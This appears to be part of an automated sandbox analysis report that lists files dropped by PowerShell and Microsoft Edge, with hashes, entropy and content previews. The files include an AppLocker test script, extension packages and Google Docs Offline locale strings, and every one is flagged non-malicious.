                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):138356
                                                                                                                                                                            Entropy (8bit):7.809609231921042
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                            MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                            SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                            SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                            SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2110
                                                                                                                                                                            Entropy (8bit):5.39879698280366
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrE:8e2Fa116uCntc5toY2etjLM
                                                                                                                                                                            MD5:F4AFE9F42AD260C737F97FFEF43B3CE1
                                                                                                                                                                            SHA1:3BF51ABC2B2632A373270FDF802F69DDABD892BC
                                                                                                                                                                            SHA-256:8B60DC6873E82059941938B6DE2DBC158DDAA7A736DD3B86FA508CF88C4F978F
                                                                                                                                                                            SHA-512:A86C1E065D1635C269A3CE79131C6AB1646C57F7F40190E81AE24A08D4CB5ECF9633A5DFFBF66EE749D5B664A60BF05881C6A303AD0827206593B3F7E6708943
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4982
                                                                                                                                                                            Entropy (8bit):7.929761711048726
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                            MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                            SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                            SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                            SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):908
                                                                                                                                                                            Entropy (8bit):4.512512697156616
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                            MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                            SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                            SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                            SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1285
                                                                                                                                                                            Entropy (8bit):4.702209356847184
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                            MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                            SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                            SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                            SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1244
                                                                                                                                                                            Entropy (8bit):4.5533961615623735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                            MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                            SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                            SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                            SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                            Entropy (8bit):4.867640976960053
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                            MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                            SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                            SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                            SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3107
                                                                                                                                                                            Entropy (8bit):3.535189746470889
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                            MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                            SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                            SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                            SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1389
                                                                                                                                                                            Entropy (8bit):4.561317517930672
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                            MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                            SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                            SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                            SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1763
                                                                                                                                                                            Entropy (8bit):4.25392954144533
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                            MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                            SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                            SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                            SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):930
                                                                                                                                                                            Entropy (8bit):4.569672473374877
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                            MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                            SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                            SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                            SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):913
                                                                                                                                                                            Entropy (8bit):4.947221919047
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                            MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                            SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                            SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                            SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):806
                                                                                                                                                                            Entropy (8bit):4.815663786215102
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                            MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                            SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                            SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                            SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):883
                                                                                                                                                                            Entropy (8bit):4.5096240460083905
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                            MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                            SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                            SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                            SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1031
                                                                                                                                                                            Entropy (8bit):4.621865814402898
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                            MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                            SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                            SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                            SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1613
                                                                                                                                                                            Entropy (8bit):4.618182455684241
                                                                                                                                                                            Encrypted:false
